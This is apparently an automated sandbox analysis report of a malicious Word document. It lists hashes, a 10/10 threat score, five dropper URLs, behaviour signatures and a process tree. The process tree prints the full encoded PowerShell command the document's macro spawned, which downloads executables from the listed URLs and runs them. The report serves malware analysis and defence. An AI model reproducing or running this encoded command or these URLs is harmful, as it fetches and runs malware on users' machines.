Analysis

  • max time kernel
    252s
  • max time network
    336s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    30-11-2022 14:38

General

  • Target

    107fd6be86b92cd124d49b967f2d1d719305db9f215eb21fcc0c5c65a7dc1e14.doc

  • Size

    241KB

  • MD5

    5d796b4f80a7c7626db81ad6a55d3018

  • SHA1

    976086afeee4e35ebec99e1b3a7176c9d16a08dc

  • SHA256

    107fd6be86b92cd124d49b967f2d1d719305db9f215eb21fcc0c5c65a7dc1e14

  • SHA512

    671d3921f67c1348b01beab6af5a5619ff6890f6805bfa96ace2f02d5bf22108a1aebb7b6eb3c5d2dde12be72118ff4ecd69daf2a00500824cc727a57b95d97e

  • SSDEEP

    6144:Y77HUUUUUUUUUUUUUUUUUUUT52Vxygud92G1EBoBlf:Y77HUUUUUUUUUUUUUUUUUUUTCs/yeBlf

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://dorubi.com/lnoubt/fx/

exe.dropper

http://demo-progenajans.com/icceturkey/V81jki/

exe.dropper

http://autofashionfactory.com/HLIC/epReQJ/

exe.dropper

http://bedfont.com/selectbox/Q97C/

exe.dropper

http://bernielandry.com/wp-includes/J3h/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\107fd6be86b92cd124d49b967f2d1d719305db9f215eb21fcc0c5c65a7dc1e14.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:560
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -nop -enc JABqAGsAUQBDAHgAMQA9ACgAJwB6AEEAJwArACcARABYAEEAeAAnACsAJwBrACcAKQA7ACQARwBBAEEAUQBBAFEAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQARwBYAEEAMQBBAGsANABjAD0AKAAnAGgAdAB0AHAAOgAnACsAJwAvACcAKwAnAC8AJwArACcAZABvAHIAJwArACcAdQBiAGkALgBjAG8AbQAvAGwAbgBvAHUAJwArACcAYgB0AC8AJwArACcAZgB4AC8AQABoACcAKwAnAHQAdABwADoALwAvAGQAZQBtAG8ALQBwAHIAbwAnACsAJwBnAGUAbgBhAGoAJwArACcAYQBuAHMALgBjAG8AbQAvAGkAYwBjACcAKwAnAGUAdAAnACsAJwB1AHIAawAnACsAJwBlACcAKwAnAHkALwBWADgAMQBqAGsAaQAvAEAAaAB0AHQAJwArACcAcAA6AC8ALwBhAHUAdAAnACsAJwBvAGYAYQBzACcAKwAnAGgAaQBvAG4AZgBhACcAKwAnAGMAdABvAHIAeQAuAGMAbwBtACcAKwAnAC8ASABMAEkAQwAvAGUAJwArACcAcABSAGUAUQBKAC8AQABoAHQAdABwADoALwAvAGIAZQBkAGYAJwArACcAbwAnACsAJwBuAHQALgBjAG8AbQAnACsAJwAvAHMAZQBsACcAKwAnAGUAYwAnACsAJwB0AGIAJwArACcAbwB4AC8AUQA5ADcAQwAvAEAAaAB0AHQAcAA6AC8ALwAnACsAJwBiAGUAJwArACcAcgBuAGkAZQBsAGEAbgBkAHIAeQAuAGMAbwBtAC8AdwBwAC0AaQBuACcAKwAnAGMAbAAnACsAJwB1AGQAZQBzAC8AJwArACcASgAzAGgAJwArACcALwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABjADEAUQBCAG8AQQA9ACgAJwBQAFEAQQAnACsAJwBVACcAKwAnAEEAQQBBADEAJwApADsAJAB3AEEAQQBEAEMAVQAgAD0AIAAoACcAMQAnACsAJwA4ADkAJwApADsAJABJAEIAUQBBAEMAQQA9ACgAJwBqACcAKwAnAFEARwBBAFUAUQAnACkAOwAkAHAAQgBBAFUAQQBfAF8AVQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdwBBAEEARABDAFUAKwAoACcALgBlAHgAJwArACcAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABYAEcARABjAFgAQQB3AEEAIABpAG4AIAAkAEcAWABBADEAQQBrADQAYwApAHsAdAByAHkAewAkAEcAQQBBAFEAQQBRAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFgARwBEAGMAWABBAHcAQQAsACAAJABwAEIAQQBVAEEAXwBfAFUAKQA7ACQARgBBAEEAQQBaAG8AQwA9ACgAJwBwAGsARwBrACcAKwAnAEEAJwArACcAbwBrACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAHAAQgBBAFUAQQBfAF8AVQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAHAAQgBBAFUAQQBfAF8AVQA7ACQAUQB3AHgAQQBCAEMARABBAD0AKAAnAGoAbwBBADQAJwArACcAQQAnACsAJwBBACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABBAGsAUQAxAEEAQQBrAEEAPQAoACcATABEACcAKwAnAEEAQgAnACsAJwBCAEIAXwBBACcAKQA7AA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1404

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/296-58-0x0000000000000000-mapping.dmp

    • memory/296-60-0x000007FEFB8A1000-0x000007FEFB8A3000-memory.dmp

      Filesize

      8KB

    • memory/560-65-0x0000000000463000-0x0000000000467000-memory.dmp

      Filesize

      16KB

    • memory/560-66-0x0000000000463000-0x0000000000467000-memory.dmp

      Filesize

      16KB

    • memory/560-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/560-59-0x0000000070C5D000-0x0000000070C68000-memory.dmp

      Filesize

      44KB

    • memory/560-55-0x000000006FC71000-0x000000006FC73000-memory.dmp

      Filesize

      8KB

    • memory/560-62-0x0000000000463000-0x0000000000467000-memory.dmp

      Filesize

      16KB

    • memory/560-61-0x0000000000463000-0x0000000000467000-memory.dmp

      Filesize

      16KB

    • memory/560-63-0x0000000000463000-0x0000000000467000-memory.dmp

      Filesize

      16KB

    • memory/560-54-0x00000000721F1000-0x00000000721F4000-memory.dmp

      Filesize

      12KB

    • memory/560-57-0x00000000757E1000-0x00000000757E3000-memory.dmp

      Filesize

      8KB

    • memory/560-64-0x0000000000463000-0x0000000000467000-memory.dmp

      Filesize

      16KB

    • memory/560-72-0x0000000070C5D000-0x0000000070C68000-memory.dmp

      Filesize

      44KB

    • memory/1404-70-0x00000000024D4000-0x00000000024D7000-memory.dmp

      Filesize

      12KB

    • memory/1404-69-0x000007FEF2520000-0x000007FEF307D000-memory.dmp

      Filesize

      11.4MB

    • memory/1404-71-0x00000000024DB000-0x00000000024FA000-memory.dmp

      Filesize

      124KB

    • memory/1404-68-0x000007FEF3140000-0x000007FEF3B63000-memory.dmp

      Filesize

      10.1MB

    • memory/1404-73-0x00000000024D4000-0x00000000024D7000-memory.dmp

      Filesize

      12KB

    • memory/1404-74-0x00000000024DB000-0x00000000024FA000-memory.dmp

      Filesize

      124KB